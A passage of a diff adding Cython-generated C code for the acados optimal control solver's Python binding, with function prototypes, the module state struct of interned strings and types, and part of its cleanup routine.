PyObject *__pyx_v_field); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_lambda_funcdef_lambda(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_x); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename, PyObject *__pyx_v_overwrite); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_24__get_stat_int(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_26__get_stat_double(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_28__get_stat_matrix(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field, PyObject *__pyx_v_n, PyObject *__pyx_v_m); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_recompute); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static void __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_44__del__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_46__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_48__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_7cpython_4type_type; + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_5numpy_dtype; + PyTypeObject *__pyx_ptype_5numpy_flatiter; + PyTypeObject *__pyx_ptype_5numpy_broadcast; + PyTypeObject *__pyx_ptype_5numpy_ndarray; + PyTypeObject *__pyx_ptype_5numpy_generic; + PyTypeObject *__pyx_ptype_5numpy_number; + PyTypeObject *__pyx_ptype_5numpy_integer; + PyTypeObject *__pyx_ptype_5numpy_signedinteger; + PyTypeObject *__pyx_ptype_5numpy_unsignedinteger; + PyTypeObject *__pyx_ptype_5numpy_inexact; + PyTypeObject *__pyx_ptype_5numpy_floating; + PyTypeObject *__pyx_ptype_5numpy_complexfloating; + PyTypeObject *__pyx_ptype_5numpy_flexible; + PyTypeObject *__pyx_ptype_5numpy_character; + PyTypeObject *__pyx_ptype_5numpy_ufunc; + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; + PyObject *__pyx_type___pyx_array; + PyObject *__pyx_type___pyx_MemviewEnum; + PyObject *__pyx_type___pyx_memoryview; + PyObject *__pyx_type___pyx_memoryviewslice; + #endif + PyTypeObject *__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; + PyTypeObject *__pyx_array_type; + PyTypeObject *__pyx_MemviewEnum_type; + PyTypeObject *__pyx_memoryview_type; + PyTypeObject *__pyx_memoryviewslice_type; + PyObject *__pyx_kp_u_; + PyObject *__pyx_n_s_ASCII; + PyObject *__pyx_n_s_AcadosOcpSolverCython; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_poin; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_stat; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_stat_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_stat_3; + PyObject *__pyx_n_s_AcadosOcpSolverCython___reduce_c; + PyObject *__pyx_n_s_AcadosOcpSolverCython___setstate; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_poin; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_stat; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_stat_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_stat_3; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_constraint; + PyObject *__pyx_n_s_AcadosOcpSolverCython_constraint_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_cost_set; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_cost_set_m; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_does_not_s; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_dynamics_g; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_eval_param; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_eval_param_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_eval_param_3; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get_cost; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_get_field; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_get_is_an; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get_residu; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_get_stage; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get_stats; + PyObject *__pyx_n_s_AcadosOcpSolverCython_load_itera; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_options_se; + PyObject *__pyx_n_s_AcadosOcpSolverCython_options_se_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_print_stat; + PyObject *__pyx_n_s_AcadosOcpSolverCython_reset; + PyObject *__pyx_n_s_AcadosOcpSolverCython_set; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_set_is_not; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_set_mismat; + PyObject *__pyx_n_s_AcadosOcpSolverCython_set_new_ti; + PyObject *__pyx_n_s_AcadosOcpSolverCython_solve; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_solve_argu; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_store_iter; + PyObject *__pyx_n_s_AcadosOcpSolverCython_update_qp; + PyObject *__pyx_kp_s_All_dimensions_preceding_dimensi; + PyObject *__pyx_n_s_AssertionError; + PyObject *__pyx_kp_s_Buffer_view_does_not_expose_stri; + PyObject *__pyx_kp_s_Can_only_create_a_buffer_that_is; + PyObject *__pyx_kp_s_Cannot_assign_to_read_only_memor; + PyObject *__pyx_kp_s_Cannot_create_writable_memory_vi; + PyObject *__pyx_kp_u_Cannot_index_with_type; + PyObject *__pyx_kp_s_Cannot_transpose_memoryview_with; + PyObject *__pyx_kp_s_Dimension_d_is_not_direct; + PyObject *__pyx_n_s_Ellipsis; + PyObject *__pyx_kp_s_Empty_shape_tuple_for_cython_arr; + PyObject *__pyx_n_u_F; + PyObject *__pyx_n_s_ImportError; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0; + PyObject *__pyx_n_s_IndexError; + PyObject *__pyx_kp_s_Index_out_of_bounds_axis_d; + PyObject *__pyx_kp_s_Indirect_dimensions_not_supporte; + PyObject *__pyx_kp_u_Invalid_mode_expected_c_or_fortr; + PyObject *__pyx_kp_u_Invalid_shape_in_axis; + PyObject *__pyx_n_s_MemoryError; + PyObject *__pyx_kp_s_MemoryView_of_r_at_0x_x; + PyObject *__pyx_kp_s_MemoryView_of_r_object; + PyObject *__pyx_n_s_N; + PyObject *__pyx_kp_u_None; + PyObject *__pyx_n_s_NotImplementedError; + PyObject *__pyx_n_b_O; + PyObject *__pyx_kp_u_Out_of_bounds_on_buffer_access_a; + PyObject *__pyx_n_s_PickleError; + PyObject *__pyx_n_u_SQP; + PyObject *__pyx_n_u_SQP_RTI; + PyObject *__pyx_n_s_Sequence; + PyObject *__pyx_kp_s_Step_may_not_be_zero_axis_d; + PyObject *__pyx_kp_u_TODO; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_kp_s_Unable_to_convert_item_to_object; + PyObject *__pyx_n_s_ValueError; + PyObject *__pyx_n_s_View_MemoryView; + PyObject *__pyx_kp_u_Y_m_d_H_M_S_f; + PyObject *__pyx_kp_u__14; + PyObject *__pyx_n_u__15; + PyObject *__pyx_kp_u__2; + PyObject *__pyx_kp_u__29; + PyObject *__pyx_n_s__3; + PyObject *__pyx_kp_u__6; + PyObject *__pyx_kp_u__7; + PyObject *__pyx_n_s__84; + PyObject *__pyx_n_s_abc; + PyObject *__pyx_n_s_acados_template_acados_ocp_solve; + PyObject *__pyx_n_s_allocate_buffer; + PyObject *__pyx_n_u_alpha; + PyObject *__pyx_n_u_alpha_min; + PyObject *__pyx_n_u_alpha_reduction; + PyObject *__pyx_kp_u_alpha_values_are_not_available_f; + PyObject *__pyx_kp_u_and; + PyObject *__pyx_n_s_array; + PyObject *__pyx_n_s_ascontiguousarray; + PyObject *__pyx_n_s_asfortranarray; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_kp_u_at_stage; + PyObject *__pyx_n_s_base; + PyObject *__pyx_n_s_c; + PyObject *__pyx_n_u_c; + PyObject *__pyx_n_s_class; + PyObject *__pyx_n_s_class_getitem; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_collections; + PyObject *__pyx_kp_s_collections_abc; + PyObject *__pyx_n_s_constraints_fields; + PyObject *__pyx_n_s_constraints_set; + PyObject *__pyx_kp_s_contiguous_and_direct; + PyObject *__pyx_kp_s_contiguous_and_indirect; + PyObject *__pyx_n_s_cost_fields; + PyObject *__pyx_n_s_cost_set; + PyObject *__pyx_n_s_count; + PyObject *__pyx_n_s_datetime; + PyObject *__pyx_n_s_default; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_n_s_dims; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_double_fields; + PyObject *__pyx_n_s_double_value; + PyObject *__pyx_n_s_dtype; + PyObject *__pyx_n_s_dtype_is_object; + PyObject *__pyx_n_s_dump; + PyObject *__pyx_n_s_dynamics_get; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_encode; + PyObject *__pyx_n_s_enter; + PyObject *__pyx_n_s_enumerate; + PyObject *__pyx_n_u_eps_sufficient_descent; + PyObject *__pyx_n_s_error; + PyObject *__pyx_n_s_eval_param_sens; + PyObject *__pyx_n_u_ex; + PyObject *__pyx_n_s_exit; + PyObject *__pyx_n_s_f; + PyObject *__pyx_n_s_field; + PyObject *__pyx_n_s_field_2; + PyObject *__pyx_n_s_fields; + PyObject *__pyx_n_s_filename; + PyObject *__pyx_n_s_flags; + PyObject *__pyx_n_s_float64; + PyObject *__pyx_kp_u_for_field; + PyObject *__pyx_n_s_format; + PyObject *__pyx_n_s_fortran; + PyObject *__pyx_n_u_fortran; + PyObject *__pyx_n_s_full_stats; + PyObject *__pyx_n_u_full_step_dual; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_get; + PyObject *__pyx_n_s_get_cost; + PyObject *__pyx_n_s_get_pointers_solver; + PyObject *__pyx_n_s_get_residuals; + PyObject *__pyx_n_s_get_stat_double; + PyObject *__pyx_n_s_get_stat_int; + PyObject *__pyx_n_s_get_stat_matrix; + PyObject *__pyx_n_s_get_stats; + PyObject *__pyx_n_s_getcwd; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_u_globalization; + PyObject *__pyx_n_u_globalization_use_SOC; + PyObject *__pyx_kp_u_got; + PyObject *__pyx_kp_u_got_differing_extents_in_dimensi; + PyObject *__pyx_n_s_i; + PyObject *__pyx_n_s_id; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_indent; + PyObject *__pyx_n_s_index; + PyObject *__pyx_n_u_initialize_t_slacks; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_int; + PyObject *__pyx_n_s_int_fields; + PyObject *__pyx_n_s_int_value; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_isfile; + PyObject *__pyx_n_s_itemsize; + PyObject *__pyx_kp_s_itemsize_0_for_cython_array; + PyObject *__pyx_n_u_iterate; + PyObject *__pyx_n_s_join; + PyObject *__pyx_n_s_json; + PyObject *__pyx_kp_u_json_2; + PyObject *__pyx_n_s_key; + PyObject *__pyx_n_s_keys; + PyObject *__pyx_n_u_lam; + PyObject *__pyx_n_u_lam_2; + PyObject *__pyx_n_u_lbu; + PyObject *__pyx_n_u_lbx; + PyObject *__pyx_n_u_line_search_use_sufficient_desce; + PyObject *__pyx_n_s_load; + PyObject *__pyx_n_s_load_iterate; + PyObject *__pyx_kp_u_load_iterate_failed_file_does_no; + PyObject *__pyx_n_s_m; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_mem_fields; + PyObject *__pyx_n_s_memview; + PyObject *__pyx_n_s_min_size; + PyObject *__pyx_n_s_mode; + PyObject *__pyx_n_s_model_name; + PyObject *__pyx_n_s_msg; + PyObject *__pyx_n_s_n; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_name_2; + PyObject *__pyx_n_s_ndim; + PyObject *__pyx_n_s_new; + PyObject *__pyx_n_s_new_time_steps; + PyObject *__pyx_n_s_nlp_solver_type; + PyObject *__pyx_kp_s_no_default___reduce___due_to_non; + PyObject *__pyx_n_s_np; + PyObject *__pyx_n_s_numpy; + PyObject *__pyx_kp_u_numpy_core_multiarray_failed_to; + PyObject *__pyx_kp_u_numpy_core_umath_failed_to_impor; + PyObject *__pyx_n_s_nx; + PyObject *__pyx_n_s_obj; + PyObject *__pyx_n_s_open; + PyObject *__pyx_n_s_options_set; + PyObject *__pyx_n_s_order; + PyObject *__pyx_n_s_os; + PyObject *__pyx_n_s_out; + PyObject *__pyx_n_s_out_fields; + PyObject *__pyx_n_s_out_mat; + PyObject *__pyx_n_s_overwrite; + PyObject *__pyx_n_u_p; + PyObject *__pyx_n_s_pack; + PyObject *__pyx_n_s_path; + PyObject *__pyx_n_u_pi; + PyObject *__pyx_n_u_pi_2; + PyObject *__pyx_n_s_pickle; + PyObject *__pyx_n_s_print; + PyObject *__pyx_n_u_print_level; + PyObject *__pyx_n_s_print_statistics; + PyObject *__pyx_n_s_pyx_PickleError; + PyObject *__pyx_n_s_pyx_checksum; + PyObject *__pyx_n_s_pyx_result; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_type; + PyObject *__pyx_n_s_pyx_unpickle_Enum; + PyObject *__pyx_n_s_pyx_vtable; + PyObject *__pyx_n_u_qp_iter; + PyObject *__pyx_n_u_qp_mu0; + PyObject *__pyx_n_s_qp_solver_cond_N; + PyObject *__pyx_n_u_qp_tau_min; + PyObject *__pyx_n_u_qp_tol_comp; + PyObject *__pyx_n_u_qp_tol_eq; + PyObject *__pyx_n_u_qp_tol_ineq; + PyObject *__pyx_n_u_qp_tol_stat; + PyObject *__pyx_n_u_qp_warm_start; + PyObject *__pyx_n_u_r; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_recompute; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_register; + PyObject *__pyx_n_b_res_comp; + PyObject *__pyx_n_b_res_eq; + PyObject *__pyx_n_b_res_ineq; + PyObject *__pyx_n_b_res_stat; + PyObject *__pyx_n_s_reset; + PyObject *__pyx_n_u_residuals; + PyObject *__pyx_n_u_rti_phase; + PyObject *__pyx_n_s_self; + PyObject *__pyx_n_s_set; + PyObject *__pyx_n_s_set_new_time_steps; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_shape; + PyObject *__pyx_n_s_size; + PyObject *__pyx_n_u_sl; + PyObject *__pyx_n_u_sl_2; + PyObject *__pyx_n_s_solution; + PyObject *__pyx_n_s_solve; + PyObject *__pyx_kp_u_solver_option_must_be_of_type_fl; + PyObject *__pyx_kp_u_solver_option_must_be_of_type_in; + PyObject *__pyx_kp_u_solver_option_must_be_of_type_st; + PyObject *__pyx_n_s_sort_keys; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_n_s_split; + PyObject *__pyx_n_s_sqp_iter; + PyObject *__pyx_n_u_sqp_iter; + PyObject *__pyx_n_s_stage; + PyObject *__pyx_n_s_start; + PyObject *__pyx_n_s_stat_m; + PyObject *__pyx_n_u_stat_m; + PyObject *__pyx_n_s_stat_n; + PyObject *__pyx_n_u_stat_n; + PyObject *__pyx_n_u_statistics; + PyObject *__pyx_n_s_step; + PyObject *__pyx_n_u_step_length; + PyObject *__pyx_n_s_stop; + PyObject *__pyx_n_s_store_iterate; + PyObject *__pyx_n_s_store_iterate_locals_lambda; + PyObject *__pyx_kp_u_stored_current_iterate_in; + PyObject *__pyx_n_s_strftime; + PyObject *__pyx_kp_s_strided_and_direct; + PyObject *__pyx_kp_s_strided_and_direct_or_indirect; + PyObject *__pyx_kp_s_strided_and_indirect; + PyObject *__pyx_n_s_string_fields; + PyObject *__pyx_n_s_string_value; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_struct; + PyObject *__pyx_n_u_su; + PyObject *__pyx_n_u_su_2; + PyObject *__pyx_n_s_sys; + PyObject *__pyx_n_u_t; + PyObject *__pyx_n_u_t_2; + PyObject *__pyx_n_s_test; + PyObject *__pyx_kp_s_third_party_acados_acados_templa; + PyObject *__pyx_n_u_time_glob; + PyObject *__pyx_n_u_time_lin; + PyObject *__pyx_n_u_time_qp; + PyObject *__pyx_n_u_time_qp_solver_call; + PyObject *__pyx_n_u_time_qp_xcond; + PyObject *__pyx_n_u_time_reg; + PyObject *__pyx_n_u_time_sim; + PyObject *__pyx_n_u_time_sim_ad; + PyObject *__pyx_n_u_time_sim_la; + PyObject *__pyx_n_u_time_solution_sensitivities; + PyObject *__pyx_n_u_time_tot; + PyObject *__pyx_n_u_tol_comp; + PyObject *__pyx_n_u_tol_eq; + PyObject *__pyx_n_u_tol_ineq; + PyObject *__pyx_n_u_tol_stat; + PyObject *__pyx_n_s_tolist; + PyObject *__pyx_n_u_u; + PyObject *__pyx_n_u_u_2; + PyObject *__pyx_n_u_ubu; + PyObject *__pyx_n_u_ubx; + PyObject *__pyx_kp_s_unable_to_allocate_array_data; + PyObject *__pyx_kp_s_unable_to_allocate_shape_and_str; + PyObject *__pyx_n_s_unpack; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_s_update_qp_solver_cond_N; + PyObject *__pyx_n_s_utcnow; + PyObject *__pyx_kp_u_utf_8; + PyObject *__pyx_n_s_value; + PyObject *__pyx_n_s_value_2; + PyObject *__pyx_n_s_value_shape; + PyObject *__pyx_n_s_version_info; + PyObject *__pyx_n_u_w; + PyObject *__pyx_n_u_warm_start_first_qp; + PyObject *__pyx_kp_u_with_dimension; + PyObject *__pyx_kp_u_with_dimension_you_have; + PyObject *__pyx_n_b_x; + PyObject *__pyx_n_s_x; + PyObject *__pyx_n_u_x; + PyObject *__pyx_n_u_x_2; + PyObject *__pyx_n_u_xdot_guess; + PyObject *__pyx_n_u_y_ref; + PyObject *__pyx_kp_u_you_have; + PyObject *__pyx_n_u_yref; + PyObject *__pyx_n_u_z; + PyObject *__pyx_n_u_z_2; + PyObject *__pyx_n_u_z_guess; + PyObject *__pyx_n_s_zeros; + PyObject *__pyx_int_0; + PyObject *__pyx_int_1; + PyObject *__pyx_int_2; + PyObject *__pyx_int_3; + PyObject *__pyx_int_4; + PyObject *__pyx_int_6; + PyObject *__pyx_int_7; + PyObject *__pyx_int_112105877; + PyObject *__pyx_int_136983863; + PyObject *__pyx_int_184977713; + PyObject *__pyx_int_neg_1; + PyObject *__pyx_int_neg_5; + PyObject *__pyx_slice__5; + PyObject *__pyx_tuple__4; + PyObject *__pyx_tuple__8; + PyObject *__pyx_tuple__9; + PyObject *__pyx_slice__16; + PyObject *__pyx_tuple__10; + PyObject *__pyx_tuple__11; + PyObject *__pyx_tuple__12; + PyObject *__pyx_tuple__13; + PyObject *__pyx_tuple__17; + PyObject *__pyx_tuple__18; + PyObject *__pyx_tuple__19; + PyObject *__pyx_tuple__20; + PyObject *__pyx_tuple__21; + PyObject *__pyx_tuple__22; + PyObject *__pyx_tuple__23; + PyObject *__pyx_tuple__24; + PyObject *__pyx_tuple__25; + PyObject *__pyx_tuple__26; + PyObject *__pyx_tuple__27; + PyObject *__pyx_tuple__28; + PyObject *__pyx_tuple__30; + PyObject *__pyx_tuple__31; + PyObject *__pyx_tuple__32; + PyObject *__pyx_tuple__33; + PyObject *__pyx_tuple__34; + PyObject *__pyx_tuple__35; + PyObject *__pyx_tuple__36; + PyObject *__pyx_tuple__37; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__39; + PyObject *__pyx_tuple__41; + PyObject *__pyx_tuple__45; + PyObject *__pyx_tuple__47; + PyObject *__pyx_tuple__49; + PyObject *__pyx_tuple__51; + PyObject *__pyx_tuple__52; + PyObject *__pyx_tuple__55; + PyObject *__pyx_tuple__57; + PyObject *__pyx_tuple__58; + PyObject *__pyx_tuple__60; + PyObject *__pyx_tuple__62; + PyObject *__pyx_tuple__65; + PyObject *__pyx_tuple__67; + PyObject *__pyx_tuple__69; + PyObject *__pyx_tuple__71; + PyObject *__pyx_tuple__72; + PyObject *__pyx_tuple__74; + PyObject *__pyx_tuple__77; + PyObject *__pyx_tuple__79; + PyObject *__pyx_tuple__82; + PyObject *__pyx_codeobj__40; + PyObject *__pyx_codeobj__42; + PyObject *__pyx_codeobj__43; + PyObject *__pyx_codeobj__44; + PyObject *__pyx_codeobj__46; + PyObject *__pyx_codeobj__48; + PyObject *__pyx_codeobj__50; + PyObject *__pyx_codeobj__53; + PyObject *__pyx_codeobj__54; + PyObject *__pyx_codeobj__56; + PyObject *__pyx_codeobj__59; + PyObject *__pyx_codeobj__61; + PyObject *__pyx_codeobj__63; + PyObject *__pyx_codeobj__64; + PyObject *__pyx_codeobj__66; + PyObject *__pyx_codeobj__68; + PyObject *__pyx_codeobj__70; + PyObject *__pyx_codeobj__73; + PyObject *__pyx_codeobj__75; + PyObject *__pyx_codeobj__76; + PyObject *__pyx_codeobj__78; + PyObject *__pyx_codeobj__80; + PyObject *__pyx_codeobj__81; + PyObject *__pyx_codeobj__83; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7cpython_4type_type); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_dtype); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flatiter); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_broadcast); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ndarray); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_generic); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_number); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_integer); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_signedinteger); + 